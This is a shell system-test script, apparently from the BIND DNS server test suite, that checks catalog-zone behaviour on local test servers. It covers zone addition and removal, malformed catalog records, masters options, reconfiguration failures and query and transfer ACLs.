"$SYSTEMTESTTOP/conf.sh" + +dig_with_opts() { + "$DIG" -p "${PORT}" "$@" +} + +rndccmd() ( + "$RNDC" -c "$SYSTEMTESTTOP/common/rndc.conf" -p "${CONTROLPORT}" -s "$@" +) + +_wait_for_message() ( + nextpartpeek "$1" > wait_for_message.$n + grep -F "$2" wait_for_message.$n >/dev/null +) + +wait_for_message() ( + retry_quiet 20 _wait_for_message "$@" +) + +_wait_for_rcode() ( + rcode="$1" + qtype="$2" + ns="$3" + qname="$4" + file="$5" + shift 5 + dig_with_opts "$ns" "$qtype" "$qname" "$@" >"$file" || return 1 + grep "status: $rcode" "$file" >/dev/null +) + +wait_for_rcode() ( + retry_quiet 10 _wait_for_rcode "$@" +) + +wait_for_soa() ( + wait_for_rcode NOERROR SOA "$@" +) + +wait_for_a() ( + wait_for_rcode NOERROR A "$@" +) + +wait_for_no_soa() { + wait_for_rcode REFUSED SOA "$@" +} + +_wait_for_zonefile() ( + # shellcheck disable=SC2234 + [ -f "$1" ] +) + +wait_for_zonefile() ( + retry_quiet 10 _wait_for_zonefile "$@" +) + +_wait_for_no_zonefile() ( + # shellcheck disable=SC2234 + [ ! -f "$1" ] +) + +wait_for_no_zonefile() ( + retry_quiet 10 _wait_for_no_zonefile "$@" +) + +status=0 +n=0 +########################################################################## +echo_i "Testing adding/removing of domain in catalog zone" +n=$((n+1)) +echo_i "checking that dom1.example. is not served by primary ($n)" +ret=0 +wait_for_no_soa @10.53.0.1 dom1.example. dig.out.test$n || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "Adding a domain dom1.example. to primary via RNDC ($n)" +ret=0 +# enough initial content for IXFR response when TXT record is added below +echo "@ 3600 IN SOA . . 1 3600 3600 3600 3600" > ns1/dom1.example.db +echo "@ 3600 IN NS invalid." >> ns1/dom1.example.db +echo "foo 3600 IN TXT some content here" >> ns1/dom1.example.db +echo "bar 3600 IN TXT some content here" >> ns1/dom1.example.db +echo "xxx 3600 IN TXT some content here" >> ns1/dom1.example.db +echo "yyy 3600 IN TXT some content here" >> ns1/dom1.example.db +rndccmd 10.53.0.1 addzone dom1.example. '{ type primary; file "dom1.example.db"; allow-update { any; }; notify explicit; also-notify { 10.53.0.2; }; };' || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "checking that dom1.example. is now served by primary ($n)" +ret=0 +wait_for_soa @10.53.0.1 dom1.example. dig.out.test$n || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +nextpart ns2/named.run >/dev/null + +n=$((n+1)) +echo_i "Adding domain dom1.example. to catalog1 zone ($n)" +ret=0 +$NSUPDATE -d <<END >> nsupdate.out.test$n 2>&1 || ret=1 + server 10.53.0.1 ${PORT} + update add e721433b6160b450260d4f54b3ec8bab30cb3b83.zones.catalog1.example. 3600 IN PTR dom1.example. + send +END +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "waiting for secondary to sync up ($n)" +ret=0 +wait_for_message ns2/named.run "catz: adding zone 'dom1.example' from catalog 'catalog1.example'" && +wait_for_message ns2/named.run "transfer of 'dom1.example/IN' from 10.53.0.1#${PORT}: Transfer status: success" || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "checking that dom1.example. is served by secondary ($n)" +ret=0 +wait_for_soa @10.53.0.2 dom1.example. dig.out.test$n || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "checking that zone-directory is populated ($n)" +ret=0 +wait_for_zonefile "ns2/zonedir/__catz___default_catalog1.example_dom1.example.db" || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "update dom1.example. ($n)" +ret=0 +$NSUPDATE -d <<END >> nsupdate.out.test$n 2>&1 || ret=1 + server 10.53.0.1 ${PORT} + update add dom1.example 0 IN TXT added record + send +END +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "wait for secondary to be updated ($n)" +ret=0 +wait_for_txt() { + dig_with_opts @10.53.0.2 TXT dom1.example. > dig.out.test$n || return 1 + grep "ANSWER: 1," dig.out.test$n > /dev/null || return 1 + grep "status: NOERROR" dig.out.test$n > /dev/null || return 1 + grep "IN.TXT." dig.out.test$n > /dev/null || return 1 +} +retry_quiet 10 wait_for_txt || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "check that journal was created for cleanup test ($n)" +ret=0 +test -f ns2/zonedir/__catz___default_catalog1.example_dom1.example.db.jnl || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "update catalog zone serial ($n)" +ret=0 +# default minimum update rate is once / 5 seconds +sleep 5 +$NSUPDATE -d <<END >> nsupdate.out.test$n 2>&1 || ret=1 + server 10.53.0.1 ${PORT} + update add catalog1.example 3600 SOA . . 20 86400 3600 86400 3600 + send +END +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "wait for catalog zone to transfer ($n)" +ret=0 +wait_for_soa_equal_20() { + dig_with_opts @10.53.0.2 SOA catalog1.example. > dig.out.test$n || return 1 + grep "ANSWER: 1," dig.out.test$n > /dev/null || return 1 + grep "status: NOERROR" dig.out.test$n > /dev/null || return 1 + grep 'IN.SOA.\. \. 20 ' dig.out.test$n > /dev/null || return 1 +} +retry_quiet 10 wait_for_soa_equal_20 || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "update dom1.example. again ($n)" +ret=0 +$NSUPDATE -d <<END >> nsupdate.out.test$n 2>&1 || ret=1 + server 10.53.0.1 ${PORT} + update add foo.dom1.example 0 IN TXT added record + send +END +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "wait for secondary to be updated again ($n)" +ret=0 +wait_for_txt() { + dig_with_opts @10.53.0.2 TXT foo.dom1.example. > dig.out.test$n || return 1 + grep "ANSWER: 2," dig.out.test$n > /dev/null || return 1 + grep "status: NOERROR" dig.out.test$n > /dev/null || return 1 + grep "IN.TXT." dig.out.test$n > /dev/null || return 1 +} +retry_quiet 10 wait_for_txt || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "removing domain dom1.example. from catalog1 zone ($n)" +ret=0 +$NSUPDATE -d <<END >> nsupdate.out.test$n 2>&1 || ret=1 + server 10.53.0.1 ${PORT} + update delete e721433b6160b450260d4f54b3ec8bab30cb3b83.zones.catalog1.example + send +END +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "waiting for secondary to sync up ($n)" +ret=0 +wait_for_message ns2/named.run "zone_shutdown: zone dom1.example/IN: shutting down" || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "checking that dom1.example. is not served by secondary ($n)" +ret=0 +wait_for_no_soa @10.53.0.2 dom1.example. dig.out.test$n || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "checking that zone-directory is emptied ($n)" +ret=0 +wait_for_no_zonefile "ns2/zonedir/__catz___default_catalog1.example_dom1.example.db" || ret=1 +wait_for_no_zonefile "ns2/zonedir/__catz___default_catalog1.example_dom1.example.db.jnl" || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +########################################################################## +echo_i "Testing various simple operations on domains, including using multiple catalog zones and garbage in zone" +n=$((n+1)) +echo_i "adding domain dom2.example. to primary via RNDC ($n)" +ret=0 +echo "@ 3600 IN SOA . . 1 3600 3600 3600 3600" > ns1/dom2.example.db +echo "@ IN NS invalid." >> ns1/dom2.example.db +rndccmd 10.53.0.1 addzone dom2.example. '{type primary; file "dom2.example.db";};' || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "adding domain dom4.example. to primary via RNDC ($n)" +ret=0 +echo "@ 3600 IN SOA . . 1 3600 3600 3600 3600" > ns1/dom4.example.db +echo "@ IN NS invalid." >> ns1/dom4.example.db +rndccmd 10.53.0.1 addzone dom4.example. '{type primary; file "dom4.example.db";};' || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "adding domains dom2.example, dom3.example. and some garbage to catalog1 zone ($n)" +ret=0 +$NSUPDATE -d <<END >> nsupdate.out.test$n 2>&1 || ret=1 + server 10.53.0.1 ${PORT} + update add 636722929740e507aaf27c502812fc395d30fb17.zones.catalog1.example. 3600 IN PTR dom2.example. + update add b901f492f3ebf6c1e5b597e51766f02f0479eb03.zones.catalog1.example. 3600 IN PTR dom3.example. + update add e721433b6160b450260d4f54b3ec8bab30cb3b83.zones.catalog1.example. 3600 IN NS foo.bar. + update add trash.catalog1.example. 3600 IN A 1.2.3.4 + update add trash2.foo.catalog1.example. 3600 IN A 1.2.3.4 + update add trash3.zones.catalog1.example. 3600 IN NS a.dom2.example. + update add foobarbaz.b901f492f3ebf6c1e5b597e51766f02f0479eb03.zones.catalog1.example. 3600 IN PTR dom3.example. + update add blahblah.636722929740e507aaf27c502812fc395d30fb17.zones.catalog1.example. 3600 IN PTR dom2.example. + update add foobarbaz.b901f492f3ebf6c1e5b597e51766f02f0479eb03.zones.catalog1.example. 3600 IN APL 1:1.2.3.4/30 + update add blahblah.636722929740e507aaf27c502812fc395d30fb17.zones.catalog1.example. 3600 IN TXT "blah blah" + update add version.catalog1.example. 3600 IN A 1.2.3.4 + send + +END +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "adding domain dom4.example. to catalog2 zone ($n)" +ret=0 +$NSUPDATE -d <<END >> nsupdate.out.test$n 2>&1 || ret=1 + server 10.53.0.3 ${PORT} + update add de26b88d855397a03f77ff1162fd055d8b419584.zones.catalog2.example. 3600 IN PTR dom4.example. + send +END +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + + +n=$((n+1)) +echo_i "waiting for secondary to sync up ($n)" +ret=0 +wait_for_message ns2/named.run "catz: updating catalog zone 'catalog2.example' with serial 2670950425" && +wait_for_message ns2/named.run "catz: adding zone 'dom2.example' from catalog 'catalog1.example'" && +wait_for_message ns2/named.run "catz: adding zone 'dom3.example' from catalog 'catalog1.example'" && +wait_for_message ns2/named.run "catz: adding zone 'dom4.example' from catalog 'catalog2.example'" && +wait_for_message ns2/named.run "transfer of 'dom4.example/IN' from 10.53.0.1#${EXTRAPORT1}: Transfer status: success" || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "checking that dom4.example. is served by secondary ($n)" +ret=0 +wait_for_soa @10.53.0.2 dom4.example. dig.out.test$n || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + + +n=$((n+1)) +echo_i "checking that dom3.example. is not served by primary ($n)" +ret=0 +wait_for_no_soa @10.53.0.1 dom3.example. dig.out.test$n || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "adding a domain dom3.example. to primary via RNDC ($n)" +ret=0 +echo "@ 3600 IN SOA . . 1 3600 3600 3600 3600" > ns1/dom3.example.db +echo "@ IN NS invalid." >> ns1/dom3.example.db +rndccmd 10.53.0.1 addzone dom3.example. '{type primary; file "dom3.example.db"; also-notify { 10.53.0.2; }; notify explicit; };' || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "checking that dom3.example. is served by primary ($n)" +ret=0 +wait_for_soa @10.53.0.1 dom3.example. dig.out.test$n || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "waiting for secondary to sync up ($n)" +ret=0 +wait_for_message ns2/named.run "catz: adding zone 'dom2.example' from catalog 'catalog1.example'" && +wait_for_message ns2/named.run "catz: adding zone 'dom3.example' from catalog 'catalog1.example'" && +wait_for_message ns2/named.run "transfer of 'dom2.example/IN' from 10.53.0.1#${PORT}: Transfer status: success" && +wait_for_message ns2/named.run "transfer of 'dom3.example/IN' from 10.53.0.1#${PORT}: Transfer status: success" || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "checking that dom3.example. is served by secondary ($n)" +ret=0 +wait_for_soa @10.53.0.2 dom3.example. dig.out.test$n || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +nextpart ns2/named.run >/dev/null + +# GL #3060 +n=$((n+1)) +echo_i "reconfiguring secondary - checking if catz survives a certain class of failed reconfiguration attempts ($n)" +ret=0 +sed -e "s/^#T3//" < ns2/named1.conf.in > ns2/named.conf.tmp +copy_setports ns2/named.conf.tmp ns2/named.conf +$RNDC -c ../common/rndc.conf -s 10.53.0.2 -p "${CONTROLPORT}" reconfig > /dev/null 2>&1 && ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "checking again that dom3.example. is served by secondary ($n)" +ret=0 +wait_for_soa @10.53.0.2 dom3.example. dig.out.test$n || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "reconfiguring secondary - reverting the bad configuration ($n)" +ret=0 +copy_setports ns2/named1.conf.in ns2/named.conf +rndccmd 10.53.0.2 reconfig || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +nextpart ns2/named.run >/dev/null + +# GL #3911 +n=$((n+1)) +echo_i "reconfiguring secondary - checking if catz survives another type of failed reconfiguration attempts ($n)" +ret=0 +sed -e "s/^#T4//" < ns2/named1.conf.in > ns2/named.conf.tmp +copy_setports ns2/named.conf.tmp ns2/named.conf +$RNDC -c ../common/rndc.conf -s 10.53.0.2 -p "${CONTROLPORT}" reconfig > /dev/null 2>&1 && ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +# catalog zone update can be deferred +sleep 2 + +n=$((n+1)) +echo_i "checking again that dom3.example. is served by secondary ($n)" +ret=0 +wait_for_soa @10.53.0.2 dom3.example. dig.out.test$n || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "reconfiguring secondary - reverting the bad configuration ($n)" +ret=0 +copy_setports ns2/named1.conf.in ns2/named.conf +rndccmd 10.53.0.2 reconfig || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +nextpart ns2/named.run >/dev/null + +n=$((n+1)) +echo_i "removing all records from catalog1 zone ($n)" +ret=0 +$NSUPDATE -d <<END >> nsupdate.out.test$n 2>&1 || ret=1 + server 10.53.0.1 ${PORT} + update delete 636722929740e507aaf27c502812fc395d30fb17.zones.catalog1.example. 3600 IN PTR dom2.example. + update delete b901f492f3ebf6c1e5b597e51766f02f0479eb03.zones.catalog1.example. 3600 IN PTR dom3.example. + update delete e721433b6160b450260d4f54b3ec8bab30cb3b83.zones.catalog1.example. 3600 IN NS foo.bar. + update delete trash.catalog1.example. 3600 IN A 1.2.3.4 + update delete trash2.foo.catalog1.example. 3600 IN A 1.2.3.4 + update delete trash3.zones.catalog1.example. 3600 IN NS a.dom2.example. + update delete foobarbaz.b901f492f3ebf6c1e5b597e51766f02f0479eb03.zones.catalog1.example. 3600 IN PTR dom3.example. + update delete blahblah.636722929740e507aaf27c502812fc395d30fb17.zones.catalog1.example. 3600 IN PTR dom2.example. + update delete foobarbaz.b901f492f3ebf6c1e5b597e51766f02f0479eb03.zones.catalog1.example. 3600 IN APL 1:1.2.3.4/30 + update delete blahblah.636722929740e507aaf27c502812fc395d30fb17.zones.catalog1.example. 3600 IN TXT "blah blah" + update delete version.catalog1.example. 3600 IN A 1.2.3.4 + send + +END +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "removing all records from catalog2 zone ($n)" +ret=0 +$NSUPDATE -d <<END >> nsupdate.out.test$n 2>&1 || ret=1 + server 10.53.0.3 ${PORT} + update delete de26b88d855397a03f77ff1162fd055d8b419584.zones.catalog2.example. 3600 IN PTR dom4.example. + send +END +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +########################################################################## +echo_i "Testing masters suboption and random labels" +n=$((n+1)) +echo_i "adding dom5.example. with a valid masters suboption (IP without TSIG) and a random label ($n)" +ret=0 +$NSUPDATE -d <<END >> nsupdate.out.test$n 2>&1 || ret=1 + server 10.53.0.1 ${PORT} + update add somerandomlabel.zones.catalog1.example. 3600 IN PTR dom5.example. + update add masters.somerandomlabel.zones.catalog1.example. 3600 IN A 10.53.0.3 + send +END +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "waiting for secondary to sync up ($n)" +ret=0 +wait_for_message ns2/named.run "catz: adding zone 'dom5.example' from catalog 'catalog1.example'" && +wait_for_message ns2/named.run "transfer of 'dom5.example/IN' from 10.53.0.3#${PORT}: Transfer status: success" || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "checking that dom5.example. is served by secondary ($n)" +ret=0 +wait_for_soa @10.53.0.2 dom5.example. dig.out.test$n || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "removing dom5.example. ($n)" +ret=0 +$NSUPDATE -d <<END >> nsupdate.out.test$n 2>&1 || ret=1 + server 10.53.0.1 ${PORT} + update delete somerandomlabel.zones.catalog1.example. 3600 IN PTR dom5.example. + update delete masters.somerandomlabel.zones.catalog1.example. 3600 IN A 10.53.0.3 + send +END +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "waiting for secondary to sync up ($n)" +ret=0 +wait_for_message ns2/named.run "zone_shutdown: zone dom5.example/IN: shutting down" || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "checking that dom5.example. is no longer served by secondary ($n)" +ret=0 +wait_for_no_soa @10.53.0.2 dom5.example. dig.out.test$n || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + + +########################################################################## +echo_i "Testing masters global option" +n=$((n+1)) +echo_i "adding dom6.example. and a valid global masters option (IP without TSIG) ($n)" +ret=0 +$NSUPDATE -d <<END >> nsupdate.out.test$n 2>&1 || ret=1 + server 10.53.0.1 ${PORT} + update add masters.catalog1.example. 3600 IN A 10.53.0.3 + update add masters.catalog1.example. 3600 IN AAAA fd92:7065:b8e:ffff::3 + update add 4346f565b4d63ddb99e5d2497ff22d04e878e8f8.zones.catalog1.example. 3600 IN PTR dom6.example. + send +END +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "waiting for secondary to sync up ($n)" +ret=0 +wait_for_message ns2/named.run "catz: adding zone 'dom6.example' from catalog 'catalog1.example'" && +wait_for_message ns2/named.run "transfer of 'dom6.example/IN' from " > /dev/null || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "checking that dom6.example. is served by secondary ($n)" +ret=0 +wait_for_soa @10.53.0.2 dom6.example. dig.out.test$n || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "removing dom6.example. ($n)" +ret=0 +$NSUPDATE -d <<END >> nsupdate.out.test$n 2>&1 || ret=1 + server 10.53.0.1 ${PORT} + update delete masters.catalog1.example. 3600 IN A 10.53.0.3 + update delete masters.catalog1.example. 3600 IN AAAA fd92:7065:b8e:ffff::3 + update delete 4346f565b4d63ddb99e5d2497ff22d04e878e8f8.zones.catalog1.example. 3600 IN PTR dom6.example. + send +END +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "waiting for secondary to sync up ($n)" +ret=0 +wait_for_message ns2/named.run "zone_shutdown: zone dom6.example/IN: shutting down" || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "checking that dom6.example. is no longer served by secondary ($n)" +ret=0 +wait_for_no_soa @10.53.0.2 dom6.example. dig.out.test$n || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +nextpart ns2/named.run >/dev/null + +n=$((n+1)) +echo_i "adding dom6.example. and an invalid global masters option (TSIG without IP) ($n)" +ret=0 +$NSUPDATE -d <<END >> nsupdate.out.test$n 2>&1 || ret=1 + server 10.53.0.1 ${PORT} + update add label1.masters.catalog1.example. 3600 IN TXT "tsig_key" + update add 4346f565b4d63ddb99e5d2497ff22d04e878e8f8.zones.catalog1.example. 3600 IN PTR dom6.example. + send +END +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "waiting for secondary to sync up ($n)" +ret=0 +wait_for_message ns2/named.run "catz: adding zone 'dom6.example' from catalog 'catalog1.example'" && +wait_for_message ns2/named.run "error \"failure\" while trying to generate config for zone \"dom6.example\"" || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "removing dom6.example. ($n)" +ret=0 +$NSUPDATE -d <<END >> nsupdate.out.test$n 2>&1 || ret=1 + server 10.53.0.1 ${PORT} + update delete label1.masters.catalog1.example. 3600 IN TXT "tsig_key" + update delete 4346f565b4d63ddb99e5d2497ff22d04e878e8f8.zones.catalog1.example. 3600 IN PTR dom6.example. + send +END +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "waiting for secondary to sync up ($n)" +ret=0 +wait_for_message ns2/named.run "catz: deleting zone 'dom6.example' from catalog 'catalog1.example' - success" > /dev/null || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +########################################################################## +n=$((n+1)) +echo_i "Checking that a missing zone directory forces in-memory ($n)" +ret=0 +grep "'nonexistent' not found; zone files will not be saved" ns2/named.run > /dev/null || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +########################################################################## +echo_i "Testing allow-query and allow-transfer ACLs" +n=$((n+1)) +echo_i "adding domains dom7.example. and dom8.example. to primary via RNDC ($n)" +ret=0 +echo "@ 3600 IN SOA . . 1 3600 3600 3600 3600" > ns1/dom7.example.db +echo "@ IN NS invalid." >> ns1/dom7.example.db +rndccmd 10.53.0.1 addzone dom7.example. '{type primary; file "dom7.example.db";};' || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) +echo "@ 3600 IN SOA . . 1 3600 3600 3600 3600" > ns1/dom8.example.db +echo "@ IN NS invalid." >> ns1/dom8.example.db +rndccmd 10.53.0.1 addzone dom8.example. '{type primary; file "dom8.example.db";};' || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "checking that dom7.example. is now served by primary ($n)" +ret=0 +wait_for_soa @10.53.0.1 dom7.example. dig.out.test$n || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +nextpart ns2/named.run >/dev/null + +n=$((n+1)) +echo_i "adding domain dom7.example. to catalog1 zone with an allow-query statement ($n)" +ret=0 +$NSUPDATE -d <<END >> nsupdate.out.test$n 2>&1 || ret=1 + server 10.53.0.1 ${PORT} + update add 78833ec3c0059fd4540fee81c7eaddce088e7cd7.zones.catalog1.example. 3600 IN PTR dom7.example. + update add allow-query.78833ec3c0059fd4540fee81c7eaddce088e7cd7.zones.catalog1.example. 3600 IN APL 1:10.53.0.1/32 !1:10.53.0.0/30 1:0.0.0.0/0 + send +END +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "waiting for secondary to sync up ($n)" +ret=0 +wait_for_message ns2/named.run "catz: adding zone 'dom7.example' from catalog 'catalog1.example'" > /dev/null && +wait_for_message ns2/named.run "transfer of 'dom7.example/IN' from 10.53.0.1#${PORT}: Transfer status: success" || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "checking that dom7.example. is accessible from 10.53.0.1 ($n)" +ret=0 +wait_for_soa @10.53.0.2 dom7.example. dig.out.test$n -b 10.53.0.1 || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "checking that dom7.example. is not accessible from 10.53.0.2 ($n)" +ret=0 +wait_for_no_soa @10.53.0.2 dom7.example. dig.out.test$n -b 10.53.0.2 || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "checking that dom7.example. is accessible from 10.53.0.5 ($n)" +ret=0 +wait_for_soa @10.53.0.2 dom7.example. dig.out.test$n -b 10.53.0.5 || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +nextpart ns2/named.run >/dev/null +n=$((n+1)) +echo_i "adding dom8.example. domain and global allow-query and allow-transfer ACLs ($n)" +ret=0 +$NSUPDATE -d <<END >> nsupdate.out.test$n 2>&1 || ret=1 + server 10.53.0.1 ${PORT} + update add cba95222e308baba42417be6021026fdf20827b6.zones.catalog1.example. 3600 IN PTR dom8.example + update add allow-query.catalog1.example. 3600 IN APL 1:10.53.0.1/32 + update add allow-transfer.catalog1.example. 3600 IN APL 1:10.53.0.2/32 + send +END +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "waiting for secondary to sync up ($n)" +ret=0 +wait_for_message ns2/named.run "catz: update_from_db: new zone merged" && +wait_for_message ns2/named.run "transfer of 'dom8.example/IN' from 10.53.0.1#${PORT}: Transfer status: success" || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "checking that dom8.example. is accessible from 10.53.0.1 ($n)" +ret=0 +wait_for_soa @10.53.0.2 dom8.example. dig.out.test$n -b 10.53.0.1 || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "checking that dom8.example. is not accessible from 10.53.0.2 ($n)" +ret=0 +wait_for_no_soa @10.53.0.2 dom8.example. dig.out.test$n -b 10.53.0.2 || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "checking that dom8.example. is not AXFR accessible from 10.53.0.1 ($n)" +ret=0 +dig_with_opts @10.53.0.2 axfr dom8.example. -b 10.53.0.1 > dig.out.test$n +grep "Transfer failed." dig.out.test$n > /dev/null || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "checking that dom8.example. is AXFR accessible from 10.53.0.2 ($n)" +ret=0 +dig_with_opts @10.53.0.2 axfr dom8.example. -b 10.53.0.2 > dig.out.test$n +grep -v "Transfer failed." dig.out.test$n > /dev/null || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +nextpart ns2/named.run >/dev/null +n=$((n+1)) +echo_i "deleting global allow-query and allow-domain ACLs ($n)" +ret=0 +$NSUPDATE -d <<END >> nsupdate.out.test$n 2>&1 || ret=1 + server 10.53.0.1 ${PORT} + update delete allow-query.catalog1.example. 3600 IN APL 1:10.53.0.1/32 + update delete allow-transfer.catalog1.example. 3600 IN APL 1:10.53.0.2/32 + send +END +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) +ret=0 +wait_for_message ns2/named.run "catz: update_from_db: new zone merged" || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "checking that dom8.example. is accessible from 10.53.0.1 ($n)" +ret=0 +wait_for_soa @10.53.0.2 dom8.example. dig.out.test$n -b 10.53.0.1 || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "checking that dom8.example. is accessible from 10.53.0.2 ($n)" +ret=0 +wait_for_soa @10.53.0.2 dom8.example. dig.out.test$n -b 10.53.0.2 || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "checking that dom8.example. is AXFR accessible from 10.53.0.1 ($n)" +ret=0 +dig_with_opts @10.53.0.2 axfr dom8.example. -b 10.53.0.1 > dig.out.test$n +grep -v "Transfer failed." dig.out.test$n > /dev/null || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "checking that dom8.example. is AXFR accessible from 10.53.0.2 ($n)" +ret=0 +dig_with_opts @10.53.0.2 axfr dom8.example. -b 10.53.0.2 > dig.out.test$n 